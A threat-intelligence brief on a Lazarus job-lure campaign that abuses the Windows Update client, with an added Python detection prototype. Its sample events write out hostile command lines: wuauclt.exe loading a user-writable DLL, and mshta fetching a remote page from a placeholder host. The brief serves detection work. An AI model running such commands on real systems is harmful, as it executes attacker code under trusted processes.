February 01, 2022

Lazarus Uses Windows Update Client

Industry: Defense | Level: Operational | Source: Malwarebytes

Malwarebytes' Threat Intelligence team has identified a new wave of activity from the North Korean threat group Lazarus, observed as early as January 18th, 2022. As in past campaigns, the group's phishing lure is a new job opportunity, this time aimed at the defense industry: the job offers are made to appear to originate from Lockheed Martin, BAE Systems, Boeing and Northrop Grumman. One of the two malicious documents uses multiple process injections for defense evasion and achieves persistence through the Startup folder. Also a first for a Lazarus campaign is the use of GitHub for command and control (C2). The second malicious document differs mainly in that, upon macro execution, mshta runs a remote HTML page. To evade detection, the campaign abuses the Windows Update client (wuauclt.exe): the LNK file used for persistence invokes the client to load the malicious DLL, so the payload runs under a trusted, Microsoft-signed process rather than being launched directly.
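The three behaviours summarised above (the Windows Update client loading a DLL it was not asked to by the update service, a launch from the Startup folder, and an Office process spawning mshta with a remote page) can each be expressed as a simple process-creation rule. The following is an added detection prototype, not code from Malwarebytes or Anvilogic. The log records are constructed here and modelled loosely on Sysmon Event ID 1 fields (Image, CommandLine, ParentImage, CurrentDirectory); the wuauclt.exe argument pattern `/UpdateDeploymentProvider <dll> /RunHandlerComServer` is the publicly documented way of making the client load a DLL, and the tuning that treats an svchost.exe parent with a bare system DLL name as benign is an assumption to be validated against your own baseline.

```python
"""Added detection prototype for the TTPs described above.

Records are constructed to resemble Sysmon Event ID 1 (process creation);
they are not real telemetry. Field names are an assumption of this example.
"""
import re
from typing import Callable, Dict, List

# Per-user or all-users Startup folder anywhere in a path.
STARTUP_RE = re.compile(r"\\Start Menu\\Programs\\Startup(?:\\|$)", re.IGNORECASE)
SYSTEM32_RE = re.compile(r"^[A-Za-z]:\\Windows\\System32\\", re.IGNORECASE)
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe"}


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows path ('C:\\x\\y.exe' -> 'y.exe')."""
    return path.rsplit("\\", 1)[-1].lower()


def wuauclt_dll_load(ev: Dict[str, str]) -> bool:
    """wuauclt.exe asked to load a DLL via /UpdateDeploymentProvider ... /RunHandlerComServer.

    Tuning assumption (not from the source): genuine update activity is spawned
    by the Windows Update service host (svchost.exe) and names the engine DLL
    without a path. Any other parent, or a DLL path outside System32, is flagged.
    """
    if _basename(ev["Image"]) != "wuauclt.exe":
        return False
    cmd = ev["CommandLine"]
    m = re.search(r'/UpdateDeploymentProvider\s+"?([^"\s]+)', cmd, re.IGNORECASE)
    if not m or not re.search(r"/RunHandlerComServer", cmd, re.IGNORECASE):
        return False
    dll = m.group(1)
    bad_parent = _basename(ev.get("ParentImage", "")) != "svchost.exe"
    outside_system32 = "\\" in dll and not SYSTEM32_RE.match(dll)
    return bad_parent or outside_system32


def startup_folder_execution(ev: Dict[str, str]) -> bool:
    """Process started from, or referencing, a Startup folder (e.g. via an LNK)."""
    return bool(STARTUP_RE.search(ev.get("CurrentDirectory", ""))
                or STARTUP_RE.search(ev.get("CommandLine", "")))


def office_spawns_mshta(ev: Dict[str, str]) -> bool:
    """mshta.exe launched by an Office application with a remote URL argument."""
    return (_basename(ev["Image"]) == "mshta.exe"
            and _basename(ev.get("ParentImage", "")) in OFFICE_PARENTS
            and re.search(r"https?://", ev["CommandLine"], re.IGNORECASE) is not None)


RULES: Dict[str, Callable[[Dict[str, str]], bool]] = {
    "Windows Update Client Loading Untrusted DLL": wuauclt_dll_load,
    "Execution from Startup Folder": startup_folder_execution,
    "Office Application Spawning mshta with Remote Page": office_spawns_mshta,
}


def triage(events: List[Dict[str, str]]) -> Dict[int, List[str]]:
    """Map each event index to the list of rule names it matched (unmatched events omitted)."""
    hits: Dict[int, List[str]] = {}
    for i, ev in enumerate(events):
        matched = [name for name, rule in RULES.items() if rule(ev)]
        if matched:
            hits[i] = matched
    return hits


# Constructed sample events (hypothetical paths and hosts, not campaign indicators).
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {   # LNK in the user's Startup folder driving the Windows Update client to load a user-writable DLL
        "Image": r"C:\Windows\System32\wuauclt.exe",
        "CommandLine": r"wuauclt.exe /UpdateDeploymentProvider C:\Users\victim\AppData\Local\Temp\wuaueng.dll /RunHandlerComServer",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CurrentDirectory": r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup",
    },
    {   # Benign-looking update activity: service parent, engine DLL named without a path
        "Image": r"C:\Windows\System32\wuauclt.exe",
        "CommandLine": r'"C:\Windows\System32\wuauclt.exe" /UpdateDeploymentProvider wuaueng.dll /RunHandlerComServer',
        "ParentImage": r"C:\Windows\System32\svchost.exe",
        "CurrentDirectory": r"C:\Windows\System32",
    },
    {   # Word macro handing a remote HTML page to mshta
        "Image": r"C:\Windows\System32\mshta.exe",
        "CommandLine": r"mshta.exe https://example.invalid/page.html",
        "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
        "CurrentDirectory": r"C:\Users\victim\Documents",
    },
    {   # Ordinary user activity that should not match anything
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": r"notepad.exe notes.txt",
        "ParentImage": r"C:\Windows\explorer.exe",
        "CurrentDirectory": r"C:\Users\victim\Documents",
    },
]

if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["Image"], "->", ", ".join(names))
```

Running the block prints the two matching events: the Startup-folder launch of wuauclt.exe trips both the Windows Update and Startup rules, while the service-spawned update call and the notepad launch stay silent. In production the wuauclt rule is the one to baseline first, since the argument pattern itself is legitimate and only the parent and DLL location separate abuse from normal patching.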

  • Anvilogic Scenario: Malicious Document Delivering Malware
  • Anvilogic Use Cases:
    • Execution from Startup Folder
    • Symbolic OR Hard File Link Created